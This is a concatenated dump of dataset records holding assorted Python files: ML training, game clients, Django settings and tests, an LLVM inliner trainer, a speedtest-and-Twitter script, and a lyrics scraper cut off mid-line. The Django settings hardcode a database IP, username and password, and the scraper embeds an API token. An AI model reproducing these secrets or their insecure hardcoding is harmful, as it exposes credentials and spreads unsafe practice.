os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir)\n\n trainIters(encoder1, attn_decoder1, 10000, checkpoint_dir, print_every=10, save_every=100)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"313902373","text":"from google.oauth2 import service_account\nimport os, sys\n\nDIALOGFLOW_CREDENTIALS_PATH = \"credentials/smart-home.json\"\nDIALOGFLOW_PROJECT_ID = 'smart-home-1-6c30f'\nDIALOGFLOW_LANGUAGE_CODE = 'pt-BR'\nROUTINES_JSON_PATH = \"configs/routines.json\"\n\nGOOGLE_APPLICATION_CREDENTIALS = service_account.Credentials.from_service_account_file(DIALOGFLOW_CREDENTIALS_PATH)\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = DIALOGFLOW_CREDENTIALS_PATH\n\nSIMULATION = False\nSILENT_MODE = False\n\nif len(sys.argv) > 1:\n if sys.argv[1] == \"SIMULATE\":\n SIMULATION = True\n print(\"* SIMULATION ON\")\n\nif len(sys.argv) > 2:\n if sys.argv[2] == \"SILENT\":\n SILENT_MODE = True\n print(\"* SILENT_MODE enabled: type your phrases at will.\")\n","sub_path":"src/globals.py","file_name":"globals.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"407870533","text":"customer_29876 = {'First Name': 'Fred', 'Last Name': 'Sharapov', 'Address': '505 Elmwood Ave'}\njobs_to_do_list = ['email', 'texting', 'calls']\n\nprint(customer_29876[\"First Name\"])\n\n# del customer_29876[\"Last Name\"]\n# print(customer_29876[\"First Name\"])\n\nfor each_value in customer_29876.keys():\n print(each_value)\n\nfor e, each_value in customer_29876.items():\n print(\"The customer's \" + e + \" is \" + each_value)\n\ncustomers = [\n {\"Customer ID\": 0,\n \"First Name\": \"Fred\",\n \"Last Name\": \"Sharapov\"},\n {\"Customer ID\": 1,\n \"First Name\": \"David\",\n \"Last Name\": \"de Heer\"},\n {\"Customer ID\": 2,\n \"First Name\": \"Faha\",\n \"Last Name\": \"Sharapov\"},\n]\n\ncustomer_first_name = customers[0]\ncustomer_name = customer_first_name[\"Last Name\"]\nlen_customer = len(customers)\nprint(len_customer)\n","sub_path":"ch10_conditional_statements.py","file_name":"ch10_conditional_statements.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"157611488","text":"# imports\nfrom socket import *\nimport threading\nimport json\n\"\"\"\nNOTE: EMAIL MUST BE A GMAIL ACCOUNT\n\"\"\"\n\n# Class creates connection with server\nclass TakiClient:\n def __init__(self):\n # class variables\n self.player = {}\n self.client_socket = None\n self.turn = {}\n self.current_card = {}\n self.win = {}\n self.your_turn = False\n self.cards_drawn = []\n\n def create_socket(self):\n # function creates connection with server if possible\n ip = '10.0.0.12'\n port = 8007\n try:\n self.client_socket = socket()\n self.client_socket.connect((ip, port))\n print(\"Connected to host successfully!\")\n except:\n print(\"problem with connection\")\n\n def join_game(self, details):\n # function receives player details and joins the player via login or register to the game.\n # returns true if possible, otherwise false.\n is_register = \"register\" in details.keys()\n is_login = \"login\" in details.keys()\n self.player = {'user_name': details['user_name']}\n self.client_socket.send(json.dumps(details).encode())\n msg = json.loads(self.client_socket.recv(1024).decode())\n if is_login and msg['login'] == 'failed':\n return False\n if is_register and msg['register'] == 'failed':\n return False\n return True\n\n def start_game(self):\n # function starts game\n start_dict = json.loads(self.client_socket.recv(1024).decode())\n self.turn = start_dict['turn']\n self.player['hand'] = start_dict['hand']\n self.current_card = start_dict['current_card']\n\n def send_card(self, card):\n # function receives a card and removes it from thr player's hand and sends card details to server.\n self.player['hand'].remove(card)\n self.client_socket.send(json.dumps({'card': card,\n 'hand': self.player['hand']}).encode())\n\n def wait_turndata(self):\n # function makes the player wait till it is his turn\n turn_data = json.loads(self.client_socket.recv(1024).decode())\n self.win = turn_data['win']\n if not self.win:\n self.current_card = turn_data['current_card']\n self.cards_drawn = turn_data['draw_cards']\n self.draw_cards(self.cards_drawn)\n \n def draw_cards(self, cards):\n # function recieves cards and adds them to player's hand\n for card in cards:\n self.player['hand'].append(card)\n\n def receive_card(self):\n # function returns the card that was chosen by other players\n return json.loads(self.client_socket.recv(1024).decode())\n\n def change_cardcolor(self, wild_card, color):\n # function receives wild card and color\n # and changes the color of the wild card into the color that was chosen by player who used card.\n for card in self.player['hand']:\n if card['type'] == wild_card['type']:\n card['color'] = color\n\n def close_connection(self):\n # function closes connection with server\n if self.client_socket != None:\n self.client_socket.close()","sub_path":"TakiClient.py","file_name":"TakiClient.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"227572700","text":"import time\nimport traceback\n\nfrom itcast.autotest.kw.domain import Report\nfrom itcast.autotest.kw.utils import DriverUtil, TestCaseUtil, ReportUtil\n\n\ndef start():\n print('start...')\n driver = DriverUtil.get_driver()\n\n try:\n report = Report()\n report.startTime = time.time()\n\n # 加载用例套件\n case_list = TestCaseUtil.load_case_list()\n\n # 执行用例\n for test_case in case_list.test_case_list:\n print('------start execute case=[{}]'.format(test_case.case_desc))\n TestCaseUtil.execute_test_case(driver, test_case)\n print('------end execute case=[{}]'.format(test_case.case_desc))\n report.endTime = time.time()\n\n # 生成测试报告\n ReportUtil.create_report(case_list, report)\n except Exception:\n traceback.print_exc()\n finally:\n DriverUtil.quit_driver()\n\n\nif __name__ == '__main__':\n start()\n","sub_path":"autotest/kw/run_suite.py","file_name":"run_suite.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"13766047","text":"import json\nimport os\nimport tempfile\n\nimport unittest\nfrom unittest.mock import patch\n\nfrom backend.czi_hosted.common.annotations.hosted_tiledb import AnnotationsHostedTileDB\nfrom backend.czi_hosted.common.annotations.local_file_csv import AnnotationsLocalFile\nfrom backend.czi_hosted.common.config.app_config import AppConfig\nfrom backend.czi_hosted.common.config.base_config import BaseConfig\nfrom backend.test import PROJECT_ROOT, FIXTURES_ROOT\n\nfrom backend.common.errors import ConfigurationError\nfrom backend.test.test_czi_hosted.unit.common.config import ConfigTests\n\n\nclass TestDatasetConfig(ConfigTests):\n def setUp(self):\n self.config_file_name = f\"{unittest.TestCase.id(self).split('.')[-1]}.yml\"\n self.config = AppConfig()\n self.config.update_server_config(app__flask_secret_key=\"secret\")\n self.config.update_server_config(multi_dataset__dataroot=FIXTURES_ROOT)\n self.dataset_config = self.config.default_dataset_config\n self.config.complete_config()\n message_list = []\n\n def noop(message):\n message_list.append(message)\n\n messagefn = noop\n self.context = dict(messagefn=messagefn, messages=message_list)\n\n def get_config(self, **kwargs):\n file_name = self.custom_app_config(\n dataroot=f\"{FIXTURES_ROOT}\", config_file_name=self.config_file_name, **kwargs\n )\n config = AppConfig()\n config.update_from_config_file(file_name)\n return config\n\n def test_init_datatset_config_sets_vars_from_default_config(self):\n config = AppConfig()\n self.assertEqual(config.default_dataset_config.presentation__max_categories, 1000)\n self.assertEqual(config.default_dataset_config.user_annotations__type, \"local_file_csv\")\n self.assertEqual(config.default_dataset_config.diffexp__lfc_cutoff, 0.01)\n\n @patch(\"backend.czi_hosted.common.config.dataset_config.BaseConfig.validate_correct_type_of_configuration_attribute\")\n def test_complete_config_checks_all_attr(self, mock_check_attrs):\n mock_check_attrs.side_effect = BaseConfig.validate_correct_type_of_configuration_attribute()\n self.dataset_config.complete_config(self.context)\n self.assertEqual(mock_check_attrs.call_count, 19)\n\n def test_app_sets_script_vars(self):\n config = self.get_config(scripts=[\"path/to/script\"])\n config.default_dataset_config.handle_app()\n\n self.assertEqual(config.default_dataset_config.app__scripts, [{\"src\": \"path/to/script\"}])\n\n config = self.get_config(scripts=[{\"src\": \"path/to/script\", \"more\": \"different/script/path\"}])\n config.default_dataset_config.handle_app()\n self.assertEqual(\n config.default_dataset_config.app__scripts, [{\"src\": \"path/to/script\", \"more\": \"different/script/path\"}]\n )\n\n config = self.get_config(scripts=[\"path/to/script\", \"different/script/path\"])\n config.default_dataset_config.handle_app()\n # TODO @madison -- is this the desired functionality?\n self.assertEqual(\n config.default_dataset_config.app__scripts, [{\"src\": \"path/to/script\"}, {\"src\": \"different/script/path\"}]\n )\n\n config = self.get_config(scripts=[{\"more\": \"different/script/path\"}])\n with self.assertRaises(ConfigurationError):\n config.default_dataset_config.handle_app()\n\n def test_handle_user_annotations_ensures_auth_is_enabled_with_valid_auth_type(self):\n config = self.get_config(enable_users_annotations=\"true\", authentication_enable=\"false\")\n config.server_config.complete_config(self.context)\n with self.assertRaises(ConfigurationError):\n config.default_dataset_config.handle_user_annotations(self.context)\n\n config = self.get_config(enable_users_annotations=\"true\", authentication_enable=\"true\", auth_type=\"pretend\")\n with self.assertRaises(ConfigurationError):\n config.server_config.complete_config(self.context)\n\n def test_handle_user_annotations__adds_warning_message_if_annotation_vars_set_when_annotations_disabled(self):\n config = self.get_config(\n enable_users_annotations=\"false\", authentication_enable=\"false\", db_uri=\"shouldnt/be/set\"\n )\n config.default_dataset_config.handle_user_annotations(self.context)\n\n self.assertEqual(self.context[\"messages\"], [\"Warning: db_uri ignored as annotations are disabled.\"])\n\n @patch(\"backend.czi_hosted.common.config.dataset_config.DbUtils\")\n def test_handle_user_annotations__instantiates_user_annotations_class_correctly(self, mock_db_utils):\n mock_db_utils.return_value = \"123\"\n config = self.get_config(\n enable_users_annotations=\"true\", authentication_enable=\"true\", annotation_type=\"local_file_csv\"\n )\n config.server_config.complete_config(self.context)\n config.default_dataset_config.handle_user_annotations(self.context)\n self.assertIsInstance(config.default_dataset_config.user_annotations, AnnotationsLocalFile)\n\n config = self.get_config(\n enable_users_annotations=\"true\",\n authentication_enable=\"true\",\n annotation_type=\"hosted_tiledb_array\",\n db_uri=\"gotta/set/this\",\n hosted_file_directory=\"and/this\",\n )\n config.server_config.complete_config(self.context)\n config.default_dataset_config.handle_user_annotations(self.context)\n self.assertIsInstance(config.default_dataset_config.user_annotations, AnnotationsHostedTileDB)\n\n config = self.get_config(\n enable_users_annotations=\"true\", authentication_enable=\"true\", annotation_type=\"NOT_REAL\"\n )\n config.server_config.complete_config(self.context)\n with self.assertRaises(ConfigurationError):\n config.default_dataset_config.handle_user_annotations(self.context)\n\n def test_handle_local_file_csv_annotations__sets_dir_if_not_passed_in(self):\n config = self.get_config(\n enable_users_annotations=\"true\", authentication_enable=\"true\", annotation_type=\"local_file_csv\"\n )\n config.server_config.complete_config(self.context)\n config.default_dataset_config.handle_local_file_csv_annotations()\n self.assertIsInstance(config.default_dataset_config.user_annotations, AnnotationsLocalFile)\n cwd = os.getcwd()\n self.assertEqual(config.default_dataset_config.user_annotations._get_output_dir(), cwd)\n\n def test_handle_diffexp__raises_warning_for_large_datasets(self):\n config = self.get_config(lfc_cutoff=0.02, enable_difexp=\"true\", top_n=15)\n config.server_config.complete_config(self.context)\n config.default_dataset_config.handle_diffexp(self.context)\n self.assertEqual(len(self.context[\"messages\"]), 0)\n\n def test_multi_dataset(self):\n config = AppConfig()\n # test for illegal url_dataroots\n for illegal in (\"../b\", \"!$*\", \"\\\\n\", \"\", \"(bad)\"):\n config.update_server_config(\n app__flask_secret_key=\"secret\",\n multi_dataset__dataroot={\"tag\": {\"base_url\": illegal, \"dataroot\": f\"{PROJECT_ROOT}/example-dataset\"}},\n )\n with self.assertRaises(ConfigurationError):\n config.complete_config()\n\n # test for legal url_dataroots\n for legal in (\"d\", \"this.is-okay_\", \"a/b\"):\n config.update_server_config(\n app__flask_secret_key=\"secret\",\n multi_dataset__dataroot={\"tag\": {\"base_url\": legal, \"dataroot\": f\"{PROJECT_ROOT}/example-dataset\"}},\n )\n config.complete_config()\n\n # test that multi dataroots work end to end\n config.update_server_config(\n app__flask_secret_key=\"secret\",\n multi_dataset__dataroot=dict(\n s1=dict(dataroot=f\"{PROJECT_ROOT}/example-dataset\", base_url=\"set1/1/2\"),\n s2=dict(dataroot=f\"{FIXTURES_ROOT}\", base_url=\"set2\"),\n s3=dict(dataroot=f\"{FIXTURES_ROOT}\", base_url=\"set3\"),\n ),\n )\n\n # Change this default to test if the dataroot overrides below work.\n config.update_default_dataset_config(app__about_legal_tos=\"tos_default.html\")\n\n # specialize the configs for set1\n config.add_dataroot_config(\n \"s1\", user_annotations__enable=False, diffexp__enable=True, app__about_legal_tos=\"tos_set1.html\"\n )\n\n # specialize the configs for set2\n config.add_dataroot_config(\n \"s2\", user_annotations__enable=True, diffexp__enable=False, app__about_legal_tos=\"tos_set2.html\"\n )\n\n # no specializations for set3 (they get the default dataset config)\n config.complete_config()\n\n server = self.create_app(config)\n\n server.testing = True\n session = server.test_client()\n\n response = session.get(\"/set1/1/2/pbmc3k.h5ad/api/v0.2/config\")\n data_config = json.loads(response.data)\n\n assert data_config[\"config\"][\"displayNames\"][\"dataset\"] == \"pbmc3k\"\n assert data_config[\"config\"][\"parameters\"][\"annotations\"] is False\n assert data_config[\"config\"][\"parameters\"][\"disable-diffexp\"] is False\n assert data_config[\"config\"][\"parameters\"][\"about_legal_tos\"] == \"tos_set1.html\"\n\n response = session.get(\"/set2/pbmc3k.cxg/api/v0.2/config\")\n data_config = json.loads(response.data)\n assert data_config[\"config\"][\"displayNames\"][\"dataset\"] == \"pbmc3k\"\n assert data_config[\"config\"][\"parameters\"][\"annotations\"] is True\n assert data_config[\"config\"][\"parameters\"][\"about_legal_tos\"] == \"tos_set2.html\"\n\n response = session.get(\"/set3/pbmc3k.cxg/api/v0.2/config\")\n data_config = json.loads(response.data)\n assert data_config[\"config\"][\"displayNames\"][\"dataset\"] == \"pbmc3k\"\n assert data_config[\"config\"][\"parameters\"][\"annotations\"] is True\n assert data_config[\"config\"][\"parameters\"][\"disable-diffexp\"] is False\n assert data_config[\"config\"][\"parameters\"][\"about_legal_tos\"] == \"tos_default.html\"\n\n response = session.get(\"/health\")\n\n assert json.loads(response.data)[\"status\"] == \"pass\"\n\n def test_configfile_with_specialization(self):\n # test that per_dataset_config config load the default config, then the specialized config\n\n with tempfile.TemporaryDirectory() as tempdir:\n configfile = os.path.join(tempdir, \"config.yaml\")\n with open(configfile, \"w\") as fconfig:\n config = \"\"\"\n server:\n multi_dataset:\n dataroot:\n test:\n base_url: test\n dataroot: fake_dataroot\n\n dataset:\n user_annotations:\n enable: false\n type: hosted_tiledb_array\n hosted_tiledb_array:\n db_uri: fake_db_uri\n hosted_file_directory: fake_dir\n\n per_dataset_config:\n test:\n user_annotations:\n enable: true\n \"\"\"\n fconfig.write(config)\n\n app_config = AppConfig()\n app_config.update_from_config_file(configfile)\n\n test_config = app_config.dataroot_config[\"test\"]\n\n # test config from default\n self.assertEqual(test_config.user_annotations__type, \"hosted_tiledb_array\")\n self.assertEqual(test_config.user_annotations__hosted_tiledb_array__db_uri, \"fake_db_uri\")\n\n # test config from specialization\n self.assertTrue(test_config.user_annotations__enable)\n","sub_path":"backend/test/test_czi_hosted/unit/common/config/test_dataset_config.py","file_name":"test_dataset_config.py","file_ext":"py","file_size_in_byte":11777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"362470462","text":"import logging\n\nfrom flask import request\nfrom flask_api import status\nfrom sqlalchemy.exc import SQLAlchemyError\n\nfrom card_broker.models.game_state import GameState\nfrom card_broker.models.player_state import PlayerState\nfrom card_broker.models.game_info import GameInfo\n\nfrom card_broker.shared.card_operations.initial_game_state import (\n create_initial_game_state,\n create_initial_player_state\n)\nfrom card_broker.shared.db import get_new_db_session\nfrom card_broker.shared.card_service_calls import get_card_list\n\nlogger = logging.getLogger('card_broker')\n\ndef new_game():\n \"\"\"\n handles request to create new game\n \"\"\"\n request_data = request.get_json()\n game_id = request_data['gameId']\n\n card_list = get_card_list(game_id)\n\n initial_state = create_initial_game_state(card_list)\n\n new_game_info = GameInfo(game_id=game_id, players=request_data['players'])\n\n new_game = GameState(game_id=game_id, card_state=initial_state)\n\n new_players = [\n PlayerState(\n player_id=player,\n game_id=game_id,\n card_state=create_initial_player_state(card_list)\n ) for player in request_data['players']\n ]\n\n session = get_new_db_session()\n session.add(new_game_info)\n session.add(new_game)\n\n for player in new_players:\n session.add(player)\n\n try:\n session.commit()\n logger.debug(\n 'successfully created new game state for game id {}'.format(\n game_id\n )\n )\n return status.HTTP_200_OK\n except SQLAlchemyError:\n logger.error(\n 'SQLAlchemyError while attempting game state creation for game id {}'.format(\n game_id\n )\n )\n return status.HTTP_500_INTERNAL_SERVER_ERROR\n\n finally:\n session.close()\n","sub_path":"card_broker/controllers/new_game.py","file_name":"new_game.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"488223194","text":"import os\nimport sys\nimport tweepy\nimport json\nimport twitter\nimport signal\nimport time\nimport speedtest\n\ndef main():\n\n \n print(\" ____ __ __ ____ ____ ______________ \")\n print(\" / __ \\____ _ _____ ________ ____/ / / /_ __ __ / __ )/ __ \\/ _/_ __/ __ \\ \")\n print(\" / /_/ / __ \\ | /| / / _ \\/ ___/ _ \\/ __ / / __ \\/ / / / / __ / /_/ // / / / / / / / \")\n print(\" / ____/ /_/ / |/ |/ / __/ / / __/ /_/ / / /_/ / /_/ / / /_/ / _, _// / / / / /_/ / \")\n print(\"/_/ \\____/|__/|__/\\___/_/ \\___/\\__,_/ /_.___/\\__, / /_____/_/ |_/___/ /_/ \\____/ \")\n print(\" /____/ \")\n Detente = True\n while(Detente):\n try:\n print(\"--ANALIZANDO RED--\")\n c = WacharRed()\n time.sleep(5)\n except:\n print(\"--PROGRAMA FINALIZADO--\")\n Detente = False\n\n \n\n\nclass AccionesTwitter():\n\n def __init__(self):\n self.keysValidacion() \n\n def keysValidacion(self):\n \n file = open('config.json')\n jsond = json.load(file)\n\n consumerkey = jsond['validation']['twConsumerKey']\n consumersecret = jsond['validation']['twConsumerKeySecret']\n accesstoken = jsond['validation']['twAccessToken']\n accesssecret = jsond['validation']['twAccessTokenSecret']\n\n self.conexionApi(consumerkey, consumersecret, accesstoken, accesssecret)\n\n def conexionApi (self, ck, cks, at, ats):\n\n auth = tweepy.OAuthHandler(ck, cks)\n auth.set_access_token(at, ats)\n api = tweepy.API(auth)\n self.enviarTweet(api)\n\n def fraseTweet(self):\n \n print(\"eo\")\n \n def enviarTweet(self,api):\n \n api.update_status(\"fuctsx\")\n\n\nclass WacharRed():\n def __init__(self):\n self.run()\n\n\n def run(self):\n \n \n tests = os.popen(\"\\\\Users\\\\Carlos\\\\Environments\\\\project1\\\\Scripts\\\\speedtest-cli --simple\").read()\n \n resultSet = tests.split('\\n')\n ping = resultSet[0]\n download = resultSet[1]\n upload = resultSet[2]\n\n print(ping)\n print(download)\n print(upload)\n\n ping = float(ping.replace('Ping: ', '').replace(' ms', ''))\n download = float(download.replace('Download: ', '').replace(' Mbit/s', ''))\n upload = float(upload.replace('Upload: ', '').replace(' Mbit/s', ''))\n\n if (download<30):\n print(\"Que verga Telmex dame mi puto internet\")\n \n\n \n \n\n\n\n \n\n\n\nif __name__=='__main__':\n main()\n ","sub_path":"queja.py","file_name":"queja.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"402304350","text":"# -*- coding: utf-8 -*-\n\nfrom .base import *\n\n\nDEBUG = True\nDEBUG_TOOLBAR_PATCH_SETTINGS = False\n\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'HOST': '223.202.202.48',\n 'PORT': '3306',\n 'NAME': 'fuse_nova_pro',\n 'USER': 'rLukerUser',\n 'PASSWORD': 'CsP_9r0up',\n 'OPTIONS': {\n 'init_command': \"SET sql_mode='STRICT_TRANS_TABLES'\",\n },\n }\n}\n\nDJANGO_SETTINGS_MODULE_SELF = \"fuse_nova.settings.admin_settings_dev\"\n\n# SSO_NAME = 'nova-console'\nSSO_NAME = 'nova-test'\n\n# API_URL = \"223.202.202.38:8800\"\n\nAPI_URL = \"127.0.0.1:8800\"\nLOGIN_URL = '/base/admin_login/'\n\n# 本地测试可以用“*”,但是正式环境建议修改为指定域名\nALLOWED_HOSTS = [\n '*',\n]","sub_path":"fuse_nova/settings/admin_settings_pro.py","file_name":"admin_settings_pro.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"371796982","text":"# coding=utf-8\n# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nr\"\"\"Train and Eval LLVM Inliner decision rule with local_data_collector.\"\"\"\n\nimport functools\nimport os\n\nfrom absl import app\nfrom absl import flags\nfrom absl import logging\nimport gin\nfrom tf_agents.system import system_multiprocessing as multiprocessing\n\nfrom compiler_opt.rl import agent_creators\nfrom compiler_opt.rl import config\nfrom compiler_opt.rl import data_reader\nfrom compiler_opt.rl import gin_external_configurables # pylint: disable=unused-import\nfrom compiler_opt.rl import inlining_runner\nfrom compiler_opt.rl import local_data_collector\nfrom compiler_opt.rl import policy_saver\nfrom compiler_opt.rl import random_net_distillation\nfrom compiler_opt.rl import trainer\n\nflags.DEFINE_string('root_dir', os.getenv('TEST_UNDECLARED_OUTPUTS_DIR'),\n 'Root directory for writing logs/summaries/checkpoints.')\nflags.DEFINE_string('data_path', None,\n 'Path to CNS folder containing IR files.')\nflags.DEFINE_string('clang_path', 'clang', 'Path to clang binary.')\nflags.DEFINE_string('llvm_size_path', 'llvm-size', 'Path to llvm_size binary.')\nflags.DEFINE_string('launcher_path', None, 'Path to launcher binary.')\nflags.DEFINE_integer(\n 'num_workers', None,\n 'Number of parallel data collection workers. `None` for max available')\nflags.DEFINE_integer('num_modules', 100,\n 'Number of modules to collect data for each iteration.')\nflags.DEFINE_multi_string('gin_files', [],\n 'List of paths to gin configuration files.')\nflags.DEFINE_multi_string(\n 'gin_bindings', [],\n 'Gin bindings to override the values set in the config files.')\n\nFLAGS = flags.FLAGS\n\n\n@gin.configurable\ndef train_eval(agent_name='ppo',\n problem_type=None,\n warmstart_policy_dir=None,\n num_policy_iterations=0,\n num_iterations=100,\n batch_size=64,\n train_sequence_length=1,\n deploy_policy_name='saved_policy',\n use_random_network_distillation=False,\n use_stale_results=False):\n \"\"\"Train for LLVM inliner.\"\"\"\n root_dir = FLAGS.root_dir\n\n time_step_spec, action_spec = config.get_signature_spec(\n problem_type)\n preprocessing_layer_creator = config.get_preprocessing_layer_creator(\n problem_type)\n\n # Initialize trainer and policy saver.\n tf_agent = agent_creators.create_agent(agent_name, time_step_spec,\n action_spec,\n preprocessing_layer_creator)\n # create the random network distillation object\n random_network_distillation = None\n if use_random_network_distillation:\n random_network_distillation = (\n random_net_distillation.RandomNetworkDistillation(\n time_step_spec=time_step_spec,\n preprocessing_layer_creator=preprocessing_layer_creator))\n\n llvm_trainer = trainer.Trainer(\n root_dir=root_dir,\n agent=tf_agent,\n random_network_distillation=random_network_distillation,\n warmstart_policy_dir=warmstart_policy_dir)\n\n policy_dict = {\n 'saved_policy': tf_agent.policy,\n 'saved_collect_policy': tf_agent.collect_policy,\n }\n saver = policy_saver.PolicySaver(policy_dict=policy_dict)\n\n with open(os.path.join(FLAGS.data_path, 'module_paths'), 'r') as f:\n module_paths = [\n os.path.join(FLAGS.data_path, name.rstrip('\\n')) for name in f\n ]\n file_paths = [(path + '.bc', path + '.cmd') for path in module_paths]\n\n runner = inlining_runner.InliningRunner(\n clang_path=FLAGS.clang_path, llvm_size_path=FLAGS.llvm_size_path,\n launcher_path=FLAGS.launcher_path)\n\n dataset_fn = data_reader.create_sequence_example_dataset_fn(\n agent_name=agent_name,\n time_step_spec=time_step_spec,\n action_spec=action_spec,\n batch_size=batch_size,\n train_sequence_length=train_sequence_length)\n\n sequence_example_iterator_fn = (\n lambda seq_ex: iter(dataset_fn(seq_ex).repeat()))\n\n data_collector = local_data_collector.LocalDataCollector(\n file_paths=file_paths,\n num_workers=FLAGS.num_workers,\n num_modules=FLAGS.num_modules,\n runner=runner.collect_data,\n parser=sequence_example_iterator_fn,\n use_stale_results=use_stale_results)\n\n # Repeat for num_policy_iterations iterations.\n while (llvm_trainer.global_step_numpy() <\n num_policy_iterations * num_iterations):\n policy_path = os.path.join(root_dir, 'policy',\n str(llvm_trainer.global_step_numpy()))\n saver.save(policy_path)\n\n dataset_iter, monitor_dict = data_collector.collect_data(\n policy_path=os.path.join(policy_path, deploy_policy_name))\n llvm_trainer.train(dataset_iter, monitor_dict, num_iterations)\n\n data_collector.on_dataset_consumed(dataset_iter)\n\n # Save final policy.\n saver.save(root_dir)\n # Wait for all the workers to finish.\n data_collector.close_pool()\n\n\ndef main(_):\n gin.parse_config_files_and_bindings(\n FLAGS.gin_files, bindings=FLAGS.gin_bindings, skip_unknown=False)\n logging.info(gin.config_str())\n\n train_eval()\n\n\nif __name__ == '__main__':\n flags.mark_flag_as_required('data_path')\n multiprocessing.handle_main(functools.partial(app.run, main))\n","sub_path":"compiler_opt/rl/train_locally.py","file_name":"train_locally.py","file_ext":"py","file_size_in_byte":5825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"109764518","text":"\n# coding: utf-8\n\n# ### Get Top100 songs\n\n# In[1]:\n\n\ndef get_top100_list():\n output_list = list()\n url = \"https://www.billboard.com/charts/hot-100\"\n\n import requests\n from bs4 import BeautifulSoup\n \n try:\n response = requests.get(url) \n if not response.status_code == 200:\n print(\"HTTP error\",response.status_code)\n else:\n try:\n soup = BeautifulSoup(response.content,'lxml')\n except:\n print('something went wrong')\n except:\n print(\"Something went wrong with request.get\")\n \n top1_name = soup.find('div',class_='chart-number-one__title').get_text()\n top1_artist = soup.find('div',class_='chart-number-one__artist').get_text()\n output_list.append((top1_name,top1_artist))\n \n all_songs = soup.find_all('div',class_='chart-list-item__text')\n \n for song in all_songs:\n song_name = song.find('span',class_='chart-list-item__title-text').get_text()\n artist = song.find('div',class_='chart-list-item__artist').get_text()\n output_list.append((song_name,artist))\n \n return output_list\n\n\n# In[2]:\n\n\ndef get_all_info(list_of_songs):\n import requests\n import re\n from bs4 import BeautifulSoup\n all_song_info = []\n for song in list_of_songs:\n name = song[0].strip()\n pattern = r'[^()]+'\n match = re.search(pattern,name)\n name = match.group().strip()\n artist = song[1].strip()\n search_artist = artist.lower().replace(' x ',' & ')\n if ' featuring' in search_artist:\n pattern_artist = r' featuring'\n search_artist = search_artist.lower()[:re.search(pattern_artist,search_artist.lower()).span()[0]]\n token = 'agZ_VYrkzow8Wo80yQSUpgi0V9J9szWwtLF4cY9inzE-jIoOe3xrs43F9yYB28Xg'\n base_url = 'https://api.genius.com'\n headers = {'Authorization': 'Bearer ' + token}\n search_url = base_url + '/search'\n data = {'q': name + ' ' + search_artist}\n \n try:\n response = requests.get(search_url, data=data, headers=headers)\n if not response.status_code == 200:\n print(\"HTTP error\",response.status_code)\n else:\n try:\n lyric_path = 'http://genius.com'+response.json()['response']['hits'][0]['result']['path']\n except:\n print('Error while searching for the song.')\n continue\n except:\n print(\"Something went wrong with request.get\")\n continue\n\n try:\n response2 = requests.get(lyric_path)\n if not response2.status_code == 200:\n print(\"HTTP error\",response2.status_code)\n else:\n try:\n response2_page = BeautifulSoup(response2.content,'lxml')\n except:\n print('Error happens while searching for lyrics.')\n continue\n except:\n print(\"Something went wrong with request.get\")\n continue\n# list_=response2_page.find('div',class_='lyrics').find_all('a',class_='referent')\n# lyrics = ''\n# for item in list_:\n# line = item.get_text()\n# lyrics += line + ' '\n# lyrics = lyrics.replace('\\n', ' ')\n# print(lyric_path)\n try:\n lyrics = response2_page.find('div',class_='lyrics').get_text().replace('\\n',' ').strip()\n except:\n continue\n all_song_info.append((name,artist,lyrics))\n return all_song_info\n\n\n# ### Get albums information\n\n# In[3]:\n\n\ndef album_info(artist):\n import requests\n import re\n from bs4 import BeautifulSoup\n result = dict()\n token = 'agZ_VYrkzow8Wo80yQSUpgi0V9J9szWwtLF4cY9inzE-jIoOe3xrs43F9yYB28Xg'\n base_url = 'https://api.genius.com'\n headers = {'Authorization': 'Bearer ' + token}\n search_url = base_url + '/search'\n data = {'q':artist}\n \n try:\n response = requests.get(search_url, data=data, headers=headers)\n if not response.status_code == 200:\n print(\"HTTP error\",response.status_code)\n else:\n try:\n url_artist = response.json()['response']['hits'][0]['result']['primary_artist']['url']\n except:\n print('Error happens. Cannot find albums information of %s.'%artist)\n return []\n except:\n print('Something went wrong with request.get')\n return []\n try:\n response2 = requests.get(url_artist)\n if not response2.status_code == 200:\n print(\"HTTP error\",response2.status_code)\n else:\n try:\n response2_page = BeautifulSoup(response2.content,'lxml')\n except:\n print('Error happens. Cannot find albums information of %s.'%artist)\n return []\n except:\n print('Something went wrong with request.get')\n return []\n string1 = str(response2_page)\n pattern1 = r'https://genius.com/albums/[0-9A-Za-z-/]*'\n urls_album = re.findall(pattern1,string1)\n urls_album = set(urls_album)\n if len(urls_album) == 0:\n print('Cannot find albums information of %s.'%artist)\n return []\n for url_a in urls_album:\n try:\n response3 = requests.get(url_a)\n if not response3.status_code 